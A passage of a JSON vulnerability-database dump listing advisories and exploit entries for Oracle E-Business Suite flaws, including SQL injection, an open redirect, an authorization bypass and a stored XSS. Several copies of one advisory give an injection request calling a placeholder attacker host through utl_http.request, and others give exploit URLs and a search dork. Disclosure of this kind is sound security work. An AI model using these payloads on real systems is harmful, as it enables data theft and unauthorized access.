Oracle\r\nCPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/29501", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-01T18:59:47", "description": "Exploit for jsp platform in category web applications", "edition": 1, "published": "2017-04-25T00:00:00", "type": "zdt", "title": "Oracle E-Business Suite 12.2.3 - IESFOOTPRINT SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3549"], "modified": "2017-04-25T00:00:00", "href": "https://0day.today/exploit/description/27670", "id": "1337DAY-ID-27670", "sourceData": "Application: Oracle E-Business Suite\r\nVersions Affected: Oracle EBS 12.2.3\r\nVendor URL: http://oracle.com\r\nBug: SQL injection\r\nReported: 23.12.2016\r\nVendor response: 24.12.2016\r\nDate of Public Advisory: 18.04.2017\r\nReference: Oracle CPU April 2017\r\nAuthor: Dmitry Chastuhin (ERPScan)\r\n \r\nDescription\r\n \r\n1. ADVISORY INFORMATION\r\n \r\nTitle:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT\r\nAdvisory ID: [ERPSCAN-17-021]\r\nRisk: high\r\nCVE: CVE-2017-3549\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/\r\nDate published: 18.04.2017\r\nVendors contacted: Oracle\r\n \r\n \r\n2. VULNERABILITY INFORMATION\r\n \r\nClass: SQL injection\r\nImpact: read sensitive data, modify data from database\r\nRemotely Exploitable: yes\r\nLocally Exploitable: no\r\n \r\nCVSS Information\r\n \r\nCVSS Base Score v3: 8.0 / 10\r\nCVSS Base Vector:\r\nAV : Attack Vector (Related exploit range) Network (N)\r\nAC : Attack Complexity (Required attack complexity) High (H)\r\nPR : Privileges Required (Level of privileges needed to exploit) High (H)\r\nUI : User Interaction (Required user participation) None (N)\r\nS : Scope (Change in scope due to impact caused to components beyond\r\nthe vulnerable component) Changed (C)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High (H)\r\nA : Impact to Availability High (H)\r\n \r\n3. VULNERABILITY DESCRIPTION\r\n \r\nThe code comprises an SQL statement containing strings that can be\r\naltered by an attacker. The manipulated SQL statement can be used then\r\nto retrieve additional data from the database or to modify the data\r\nwithout authorization.\r\n \r\n4. VULNERABLE PACKAGES\r\n \r\nOracle EBS 12.2.3\r\n \r\n5. SOLUTIONS AND WORKAROUNDS\r\n \r\nTo correct this vulnerability, implement Oracle CPU April 2017\r\n \r\n6. AUTHOR\r\n \r\nDmitry Chastuhin\r\n \r\n \r\n7. TECHNICAL DESCRIPTION\r\n \r\nPoC\r\n \r\nvulnerable jsp name is iesfootprint.jsp\r\n \r\n deployDate = ((request.getParameter(\"deployDate\")) != null) ?\r\nrequest.getParameter(\"deployDate\") : \"\";\r\n responseDate = ((request.getParameter(\"responseDate\")) != null) ?\r\nrequest.getParameter(\"responseDate\") : \"\";\r\n dscriptName = ((request.getParameter(\"dscript_name\")) != null) ?\r\nrequest.getParameter(\"dscript_name\") : \"\";\r\n dscriptId = ((request.getParameter(\"dscriptId\")) != null) ?\r\nrequest.getParameter(\"dscriptId\") : \"\";\r\n%>\r\n \r\n<%\r\n// Process the data based on params\r\nif (showGraph) {\r\n // Create Query String\r\n StringBuffer query = new StringBuffer(\"SELECT panel_name,\r\ncount_panels, avg_time, min_time, max_time, \");\r\n query.append(\"\\'\").append(_prompts[10]).append(\"\\'\");\r\n query.append(\" Average_Time FROM (SELECT rownum, panel_name,\r\ncount_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,\r\ncount(panel_name) count_panels,\r\n(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000\r\nmin_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE\r\ndscript_id = \");\r\n query.append(dscriptId);\r\n query.append(\" AND start_time between \");\r\n query.append(\"\\'\").append(deployDate).append(\"\\'\");\r\n query.append(\" and \");\r\n query.append(\"\\'\").append(responseDate).append(\"\\'\");\r\n query.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE\r\nrownum < 11\");\r\n \r\n \r\n \r\n // Get XMLDocument for the corresponding query and Paint graph\r\n try {\r\n \r\n XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());\r\n htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);\r\n \r\nApproximate request with SQL injection\r\n \r\n \r\nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'\r\nAND utl_http.request('http://attackers_host/lalal')='1' GROUP BY\r\npanel_name)) --\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27670", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-02T19:36:49", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Oracle E-Business Suite 12.2.3 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3549"], "modified": "2017-04-20T00:00:00", "href": "https://0day.today/exploit/description/27641", "id": "1337DAY-ID-27641", "sourceData": "Application: Oracle E-Business Suite\r\nVersions Affected: Oracle EBS 12.2.3\r\nVendor URL: http://oracle.com\r\nBug: SQL injection\r\nReported: 23.12.2016\r\nVendor response: 24.12.2016\r\nDate of Public Advisory: 18.04.2017\r\nReference: Oracle CPU April 2017\r\nAuthor: Dmitry Chastuhin (ERPScan)\r\n\r\nDescription\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT\r\nAdvisory ID: [ERPSCAN-17-021]\r\nRisk: high\r\nCVE: CVE-2017-3549\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/\r\nDate published: 18.04.2017\r\nVendors contacted: Oracle\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: read sensitive data, modify data from database\r\nRemotely Exploitable: yes\r\nLocally Exploitable: no\r\n\r\nCVSS Information\r\n\r\nCVSS Base Score v3: 8.0 / 10\r\nCVSS Base Vector:\r\nAV : Attack Vector (Related exploit range) Network (N)\r\nAC : Attack Complexity (Required attack complexity) High (H)\r\nPR : Privileges Required (Level of privileges needed to exploit) High (H)\r\nUI : User Interaction (Required user participation) None (N)\r\nS : Scope (Change in scope due to impact caused to components beyond\r\nthe vulnerable component) Changed (C)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High (H)\r\nA : Impact to Availability High (H)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe code comprises an SQL statement containing strings that can be\r\naltered by an attacker. The manipulated SQL statement can be used then\r\nto retrieve additional data from the database or to modify the data\r\nwithout authorization.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle EBS 12.2.3\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, implement Oracle CPU April 2017\r\n\r\n6. AUTHOR\r\n\r\nDmitry Chastuhin\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nPoC\r\n\r\nvulnerable jsp name is iesfootprint.jsp\r\n\r\n deployDate = ((request.getParameter(\"deployDate\")) != null) ?\r\nrequest.getParameter(\"deployDate\") : \"\";\r\n responseDate = ((request.getParameter(\"responseDate\")) != null) ?\r\nrequest.getParameter(\"responseDate\") : \"\";\r\n dscriptName = ((request.getParameter(\"dscript_name\")) != null) ?\r\nrequest.getParameter(\"dscript_name\") : \"\";\r\n dscriptId = ((request.getParameter(\"dscriptId\")) != null) ?\r\nrequest.getParameter(\"dscriptId\") : \"\";\r\n%>\r\n\r\n<%\r\n// Process the data based on params\r\nif (showGraph) {\r\n // Create Query String\r\n StringBuffer query = new StringBuffer(\"SELECT panel_name,\r\ncount_panels, avg_time, min_time, max_time, \");\r\n query.append(\"\\'\").append(_prompts[10]).append(\"\\'\");\r\n query.append(\" Average_Time FROM (SELECT rownum, panel_name,\r\ncount_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,\r\ncount(panel_name) count_panels,\r\n(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000\r\nmin_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE\r\ndscript_id = \");\r\n query.append(dscriptId);\r\n query.append(\" AND start_time between \");\r\n query.append(\"\\'\").append(deployDate).append(\"\\'\");\r\n query.append(\" and \");\r\n query.append(\"\\'\").append(responseDate).append(\"\\'\");\r\n query.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE\r\nrownum < 11\");\r\n\r\n\r\n\r\n // Get XMLDocument for the corresponding query and Paint graph\r\n try {\r\n\r\n XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());\r\n htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);\r\n\r\nApproximate request with SQL injection\r\n\r\n\r\nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'\r\nAND utl_http.request('http://attackers_host/lalal')='1' GROUP BY\r\npanel_name)) --\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/27641", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-01-24T14:22:06", "description": "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect. CVE-2017-3528. Webapps exploit for JSP platform", "published": "2018-01-15T00:00:00", "type": "exploitdb", "title": "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3528"], "modified": "2018-01-15T00:00:00", "id": "EDB-ID:43592", "href": "https://www.exploit-db.com/exploits/43592/", "sourceData": "# Exploit Title: Oracle E-Business suite Open Redirect\r\n# Google Dork: inurl:OA_HTML/cabo/\r\n# Date: April 2017\r\n# Exploit Author: [author]\r\n# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\r\n# Software Link: [download link if available]\r\n# Version: Oracle E-Business Suite (REQUIRED)\r\n# Tested on: [relevant os]\r\n# CVE : CVE-2017-3528\r\n\r\nThe exploit can be leveraged for an open redirect using the following\r\nexploit path:\r\n\r\nhttps://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\\example.com\r\n\r\nOracle E-Business suite is vulnerable to an open redirect issue,\r\nspecifically the redirect parameter allows any domain to be supplied\r\nand it will be rendered on the target's site.\r\n\r\nNote I was also credited for this CVE, see the Oracle\r\nCPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/43592/"}, {"lastseen": "2017-04-25T20:47:16", "description": "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection. CVE-2017-3549. Webapps exploit for JSP platform. Tags: SQL Injection (SQLi)", "published": "2017-04-25T00:00:00", "type": "exploitdb", "title": "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3549"], "modified": "2017-04-25T00:00:00", "id": "EDB-ID:41926", "href": "https://www.exploit-db.com/exploits/41926/", "sourceData": "Application: Oracle E-Business Suite\r\nVersions Affected: Oracle EBS 12.2.3\r\nVendor URL: http://oracle.com\r\nBug: SQL injection\r\nReported: 23.12.2016\r\nVendor response: 24.12.2016\r\nDate of Public Advisory: 18.04.2017\r\nReference: Oracle CPU April 2017\r\nAuthor: Dmitry Chastuhin (ERPScan)\r\n\r\nDescription\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT\r\nAdvisory ID: [ERPSCAN-17-021]\r\nRisk: high\r\nCVE: CVE-2017-3549\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/\r\nDate published: 18.04.2017\r\nVendors contacted: Oracle\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: read sensitive data, modify data from database\r\nRemotely Exploitable: yes\r\nLocally Exploitable: no\r\n\r\nCVSS Information\r\n\r\nCVSS Base Score v3: 8.0 / 10\r\nCVSS Base Vector:\r\nAV : Attack Vector (Related exploit range) Network (N)\r\nAC : Attack Complexity (Required attack complexity) High (H)\r\nPR : Privileges Required (Level of privileges needed to exploit) High (H)\r\nUI : User Interaction (Required user participation) None (N)\r\nS : Scope (Change in scope due to impact caused to components beyond\r\nthe vulnerable component) Changed (C)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High (H)\r\nA : Impact to Availability High (H)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe code comprises an SQL statement containing strings that can be\r\naltered by an attacker. The manipulated SQL statement can be used then\r\nto retrieve additional data from the database or to modify the data\r\nwithout authorization.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle EBS 12.2.3\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, implement Oracle CPU April 2017\r\n\r\n6. AUTHOR\r\n\r\nDmitry Chastuhin\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nPoC\r\n\r\nvulnerable jsp name is iesfootprint.jsp\r\n\r\n deployDate = ((request.getParameter(\"deployDate\")) != null) ?\r\nrequest.getParameter(\"deployDate\") : \"\";\r\n responseDate = ((request.getParameter(\"responseDate\")) != null) ?\r\nrequest.getParameter(\"responseDate\") : \"\";\r\n dscriptName = ((request.getParameter(\"dscript_name\")) != null) ?\r\nrequest.getParameter(\"dscript_name\") : \"\";\r\n dscriptId = ((request.getParameter(\"dscriptId\")) != null) ?\r\nrequest.getParameter(\"dscriptId\") : \"\";\r\n%>\r\n\r\n<%\r\n// Process the data based on params\r\nif (showGraph) {\r\n // Create Query String\r\n StringBuffer query = new StringBuffer(\"SELECT panel_name,\r\ncount_panels, avg_time, min_time, max_time, \");\r\n query.append(\"\\'\").append(_prompts[10]).append(\"\\'\");\r\n query.append(\" Average_Time FROM (SELECT rownum, panel_name,\r\ncount_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,\r\ncount(panel_name) count_panels,\r\n(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000\r\nmin_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE\r\ndscript_id = \");\r\n query.append(dscriptId);\r\n query.append(\" AND start_time between \");\r\n query.append(\"\\'\").append(deployDate).append(\"\\'\");\r\n query.append(\" and \");\r\n query.append(\"\\'\").append(responseDate).append(\"\\'\");\r\n query.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE\r\nrownum < 11\");\r\n\r\n\r\n\r\n // Get XMLDocument for the corresponding query and Paint graph\r\n try {\r\n\r\n XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());\r\n htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);\r\n\r\nApproximate request with SQL injection\r\n\r\n\r\nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'\r\nAND utl_http.request('http://attackers_host/lalal')='1' GROUP BY\r\npanel_name)) --\r\n\r\n\r\n\r\n\r\n\r\n8. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and\r\nanalysis of critical enterprise applications. It was acknowledged\r\nmultiple times by the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the \"The\r\nBest Server-Side Bug\" nomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at\r\n60+ prime international security conferences in 25+ countries across\r\nthe continents ( e.g. BlackHat, RSA, HITB) and conducted private\r\ntrainings for several Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP\r\nsecurity researches.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters,\r\nYahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,\r\nChinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in\r\nvarious fields of cybersecurity (from web application to ICS/SCADA\r\nsystems), gathering their experience to conduct the best SAP security\r\nresearch.\r\n\r\n9. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. Founded in 2010, the company operates globally\r\nand enables large Oil and Gas, Financial, Retail and other\r\norganizations to secure their mission-critical processes. Named as an\r\n\u2018Emerging Vendor\u2019 in Security by CRN, listed among \u201cTOP 100 SAP\r\nSolution providers\u201d and distinguished by 30+ other awards, ERPScan is\r\nthe leading SAP SE partner in discovering and resolving security\r\nvulnerabilities. ERPScan consultants work with SAP SE in Walldorf to\r\nassist in improving the security of their latest solutions.\r\n\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISO's to evaluate and\r\nsecure SAP and Oracle ERP systems and business-critical applications\r\nfrom both cyberattacks and internal fraud. As a rule, our clients are\r\nlarge enterprises, Fortune 2000 companies and MSPs, whose requirements\r\nare to actively monitor and manage security of vast SAP and Oracle\r\nlandscapes on a global scale.\r\n\r\nWe \u2018follow the sun\u2019 and have two hubs, located in Palo Alto and\r\nAmsterdam, to provide threat intelligence services, continuous support\r\nand to operate local offices and partner network spanning 20+\r\ncountries around the globe.\r\n\r\n\r\n\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41926/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle E-Business Suite 12.1.312.2.x - Open Redirect", "edition": 1, "published": "2018-01-15T00:00:00", "title": "Oracle E-Business Suite 12.1.312.2.x - Open Redirect", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3528"], "modified": "2018-01-15T00:00:00", "id": "EXPLOITPACK:3910B3FDDB0AB5130FF0A186BC43CAAD", "href": "", "sourceData": "# Exploit Title: Oracle E-Business suite Open Redirect\n# Google Dork: inurl:OA_HTML/cabo/\n# Date: April 2017\n# Exploit Author: [author]\n# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n# Software Link: [download link if available]\n# Version: Oracle E-Business Suite (REQUIRED)\n# Tested on: [relevant os]\n# CVE : CVE-2017-3528\n\nThe exploit can be leveraged for an open redirect using the following\nexploit path:\n\nhttps://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\\example.com\n\nOracle E-Business suite is vulnerable to an open redirect issue,\nspecifically the redirect parameter allows any domain to be supplied\nand it will be rendered on the target's site.\n\nNote I was also credited for this CVE, see the Oracle\nCPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "erpscan": [{"lastseen": "2020-09-17T08:51:13", "bulletinFamily": "info", "cvelist": ["CVE-2017-3549"], "description": "**Application:** Oracle E-Business Suite \n**Versions Affected:** Oracle EBS 12.2.3 \n**Vendor:** [Oracle](<http://www.oracle.com/>) \n**Bugs:** SQL injection \n**Reported:** 23.12.2016 \n**Vendor response:** 24.12.2016 \n**Date of Public Advisory:** 18.04.2017 \n**Reference: **[Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n**Authors:** Dmitry Chastuhin (ERPScan) \n\n## VULNERABILITY INFORMATION\n\nClass: SQL injection \nImpact: read sensitive data, modify or delete data from database \nRemotely Exploitable: yes \nLocally Exploitable: no \nCVE: CVE-2017-3549\n\n### CVSS Information\n\nCVSS Base Score v3: 9.1 / 10 \nCVSS Base Vector:\n\nAV: Attack Vector (Related exploit range) | Network (N) \n---|--- \nAC: Attack Complexity (Required attack complexity) | Low (L) \nPR: Privileges Required (Level of privileges needed to exploit) | None (N) \nUI: User Interaction (Required user participation) | None (N) \nS: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) \nC: Impact to Confidentiality | High (H) \nI: Impact to Integrity | High (H) \nA: Impact to Availability| None (N) \n \n## VULNERABILITY DESCRIPTION\n\nThe code comprises an SQL statement containing strings that can be altered by an attacker. The manipulated SQL statement can be used then to retrieve additional data from the database or to modify the data without authorization.\n\n## VULNERABLE PACKAGES\n\nOracle EBS 12.2.3\n\n## SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, implement [Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>)\n\n## TECHNICAL DESCRIPTION\n\n### Proof of Concept\n\nVulnerable jsp name is iesfootprint.jsp\n\ndeployDate = ((request.getParameter(\"deployDate\")) != null) ? request.getParameter(\"deployDate\") : \"\"; responseDate = ((request.getParameter(\"responseDate\")) != null) ? request.getParameter(\"responseDate\") : \"\"; dscriptName = ((request.getParameter(\"dscript_name\")) != null) ? request.getParameter(\"dscript_name\") : \"\"; dscriptId = ((request.getParameter(\"dscriptId\")) != null) ? request.getParameter(\"dscriptId\") : \"\"; %> <% // Process the data based on params if (showGraph) { // Create Query String StringBuffer query = new StringBuffer(\"SELECT panel_name, count_panels, avg_time, min_time, max_time, \"); query.append(\"\\'\").append(_prompts[10]).append(\"\\'\"); query.append(\" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = \"); query.append(dscriptId); query.append(\" AND start_time between \"); query.append(\"\\'\").append(deployDate).append(\"\\'\"); query.append(\" and \"); query.append(\"\\'\").append(responseDate).append(\"\\'\"); query.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11\"); // Get XMLDocument for the corresponding query and Paint graph try { XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString()); htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);\n\n1\n\n2\n\n3\n\n4\n\n5\n\n6\n\n7\n\n8\n\n9\n\n10\n\n11\n\n12\n\n13\n\n14\n\n15\n\n16\n\n17\n\n18\n\n19\n\n20\n\n21\n\n22\n\n23\n\n24\n\n25\n\n26\n\n27\n\n28\n\n| \n\ndeployDate = ((request.getParameter(\"deployDate\")) != null) ? request.getParameter(\"deployDate\") : \"\";\n\nresponseDate = ((request.getParameter(\"responseDate\")) != null) ? request.getParameter(\"responseDate\") : \"\";\n\ndscriptName = ((request.getParameter(\"dscript_name\")) != null) ? request.getParameter(\"dscript_name\") : \"\";\n\ndscriptId = ((request.getParameter(\"dscriptId\")) != null) ? request.getParameter(\"dscriptId\") : \"\";\n\n%>\n\n<%\n\n// Process the data based on params\n\nif (showGraph) {\n\n// Create Query String \n\nStringBuffer query = new StringBuffer(\"SELECT panel_name, count_panels, avg_time, min_time, max_time, \");\n\nquery.append(\"\\'\").append(_prompts[10]).append(\"\\'\");\n\nquery.append(\" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = \");\n\nquery.append(dscriptId);\n\nquery.append(\" AND start_time between \");\n\nquery.append(\"\\'\").append(deployDate).append(\"\\'\");\n\nquery.append(\" and \");\n\nquery.append(\"\\'\").append(responseDate).append(\"\\'\");\n\nquery.append(\" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11\");\n\n// Get XMLDocument for the corresponding query and Paint graph\n\ntry {\n\nXMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());\n\nhtmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL); \n \n---|--- \n \nApproximate request with SQL injection\n\nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --\n\n1\n\n| \n\nhttp://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) -- \n \n---|---\n", "edition": 5, "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "ERPSCAN-17-021", "href": "https://erpscan.io/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/", "title": "SQL Injection in E-Business Suite IESFOOTPRINT", "type": "erpscan", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-17T08:51:15", "bulletinFamily": "info", "cvelist": ["CVE-2017-3556"], "description": "**Application:** Oracle E-Business Suite \n**Versions Affected:**Oracle E-Business Suite 12.2.3 \n**Vendor:** [Oracle](<http://www.oracle.com/>) \n**Bugs:** AUTH BYPASS \n**Reported:** 23.12.2016 \n**Vendor response:** 24.12.2016 \n**Date of Public Advisory:** 18.04.2017 \n**Reference: **[Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n**Authors:** Alexey Tyurin (ERPScan), Ivan Chalykin (ERPScan)\n\n## VULNERABILITY INFORMATION\n\nClass: AUTH BYPASS \nImpact: File Downloading \nRemotely Exploitable: yes \nLocally Exploitable: yes \nCVE: CVE-2017-3556\n\n### CVSS Information\n\nCVSS Base Score v3: 5.3 / 10 \nCVSS Base Vector:\n\nAV: Attack Vector (Related exploit range) | Network (N) \n---|--- \nAC: Attack Complexity (Required attack complexity) | Low (L) \nPR: Privileges Required (Level of privileges needed to exploit) | None (N) \nUI: User Interaction (Required user participation) | None (N) \nS: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) \nC: Impact to Confidentiality | Low (L) \nI: Impact to Integrity | None (N) \nA: Impact to Availability| None (N) \n \n## VULNERABILITY DESCRIPTION\n\nAn attacker can bypass authorization checks and download files stored in E-Business Suite.\n\n## VULNERABLE PACKAGES\n\nOracle E-Business Suite 12.2.3\n\n## SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, implement [Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>)\n\n## TECHNICAL DESCRIPTION\n\n### Proof of Concept\n\nVulnerable URL:\n\nhttp://victim_ebs_server/OA_HTML/fndgfm.jsp?mode=download_blob&fid=1&mac=t\n\nThis JSP allows downloading files from the system without authorization checking. For a successful attack, an attacker needs to enumerate the `fid` parameter. \n", "edition": 5, "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "ERPSCAN-17-025", "href": "https://erpscan.io/advisories/erpscan-17-025-auth-bypass-file-downloading-oracle-e-business-suite/", "title": "AUTH BYPASS For File Downloading - Oracle E-Business Suite", "type": "erpscan", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-09-17T08:51:15", "bulletinFamily": "info", "cvelist": ["CVE-2017-3557"], "description": "**Application:** Oracle E-Business Suite \n**Versions Affected:** Oracle E-Business Suite 12.2.3 \n**Vendor:** [Oracle](<http://www.oracle.com/>) \n**Bugs:** XSS \n**Reported:** 23.12.2016 \n**Vendor response:** 24.12.2016 \n**Date of Public Advisory:** 18.04.2017 \n**Reference: **[Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n**Authors:** Ivan Chalykin (ERPScan)\n\n## VULNERABILITY INFORMATION\n\nClass: XSS \nImpact: modify displayed content from a Web site, steal authentication information of a user \nRemotely Exploitable: yes \nLocally Exploitable: yes \nCVE: CVE-2017-3557\n\n### CVSS Information\n\nCVSS Base Score v3: 7.1 / 10 \nCVSS Base Vector:\n\nAV: Attack Vector (Related exploit range) | Network (N) \n---|--- \nAC: Attack Complexity (Required attack complexity) | Low (L) \nPR: Privileges Required (Level of privileges needed to exploit) | None (N) \nUI: User Interaction (Required user participation) | Required (R) \nS: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) \nC: Impact to Confidentiality | Low (L) \nI: Impact to Integrity | High (H) \nA: Impact to Availability| None (N) \n \n## VULNERABILITY DESCRIPTION\n\nAn attacker can use a special HTTP request to hijack session data of administrators or users of the web application.\n\n## VULNERABLE PACKAGES\n\nOracle E-Business Suite 12.2.3\n\n## SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, implement [Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>)\n\n## TECHNICAL DESCRIPTION\n\nThe \u201cOracle Fulfillment Management: Print Servers\u201d component is vulnerable to a Stored XSS attack due to the lack of sanitizing of \u201cPrint Server Name\u201d and \u201cConnection String\u201d parameters. \n\nVulnerable 